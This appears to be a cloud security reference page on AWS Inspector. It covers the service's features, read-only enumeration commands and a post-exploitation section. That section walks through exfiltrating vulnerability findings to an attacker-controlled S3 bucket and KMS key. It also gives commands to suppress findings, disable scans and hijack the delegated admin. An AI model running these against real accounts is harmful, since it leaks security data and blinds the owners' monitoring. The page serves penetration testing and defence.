AWS - Inspector Enum

Inspector

Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.

Key elements

Findings

Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as:

• Active: The finding has not been remediated.

• Closed: The finding has been remediated.

• Suppressed: The finding has been marked with this state due to one or more suppression rules.

Findings are also categorized into the next three types:

• Package: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues.

• Code: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches.

• Network: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups.

Filters and Suppression Rules

Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues.

Software Bill of Materials (SBOM)

A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components.

Key features

Export findings

Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status.

When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information.

Amazon EC2 instances scanning

Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through agent-based or agentless methods, depending on the scan mode settings configuration of your account.

• Agent-Based: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance.

• Agentless: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning.

The scan mode determines which method will be used to perform EC2 scans:

• Agent-Based: Involves installing the SSM agent on EC2 instances for deep inspection.

• Hybrid Scanning: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless.

Another important feature is the deep inspection for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of custom paths and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10:

• /usr/lib

• /usr/lib64

• /usr/local/lib

• /usr/local/lib64

Amazon ECR container images scanning

Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently.

• Basic Scanning: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans.

• Enhanced Scanning: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues.

Amazon Lambda functions scanning

Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions:

• Lambda standard scanning: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding.

• Lambda code scanning: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues.

Center for Internet Security (CIS) scans

Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines.

• Configuration: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title.

• Execution: Scans are performed or scheduled based on instance tags and defined schedules.

• Results: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
 | ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Exploitation

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key:

1. Create an Amazon S3 Bucket and attach a policy to it in order to be accessible from the victim Amazon Inspector:

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "allow-inspector",
			"Effect": "Allow",
			"Principal": {
				"Service": "inspector2.amazonaws.com"
			},
			"Action": [
				"s3:PutObject",
				"s3:PutObjectAcl",
				"s3:AbortMultipartUpload"
			],
			"Resource": "arn:aws:s3:::inspector-findings/*",
			"Condition": {
				"StringEquals": {
					"aws:SourceAccount": "<victim-account-id>"
				},
				"ArnLike": {
					"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
				}
			}
		}
	]
}

2. Create an Amazon KMS key and attach a policy to it in order to be usable by the victim’s Amazon Inspector:

{
    "Version": "2012-10-17",
    "Id": "key-policy",
    "Statement": [
        {
	    ...
        },
        {
            "Sid": "Allow victim Amazon Inspector to use the key",
            "Effect": "Allow",
            "Principal": {
                "Service": "inspector2.amazonaws.com"
            },
            "Action": [
                "kms:Encrypt",
                "kms:Decrypt",
                "kms:ReEncrypt*",
                "kms:GenerateDataKey*",
                "kms:DescribeKey"
            ],
            "Resource": "*",
            "Condition": {
                "StringEquals": {
                    "aws:SourceAccount": "<victim-account-id>"
                }
            }
        }
    ]
}

3. Execute the command to create the findings report exfiltrating it:

aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f

• Potential Impact: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>

• Potential Impact: Disruption of security monitoring and prevention of timely detection and remediation of security issues.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the action is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>

• Potential Impact: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

An attacker could significantly disrupt the security management structure.

• Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports.

• Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities.

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>

• Potential Impact: Disruption of the security management.

inspector2:AssociateMember, inspector2:DisassociateMember

An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>

• Potential Impact: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

An attacker with the inspector2:Disable permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the inspector2:Enable & iam:CreateServiceLinkedRole permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]

• Potential Impact: Creation of blind spots in the security monitoring.

inspector2:UpdateOrganizationConfiguration

An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>

• Potential Impact: Alter security scan policies and configurations for the organization.

inspector2:TagResource, inspector2:UntagResource

An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

• Potential Impact: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation.

References

• https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html

• https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html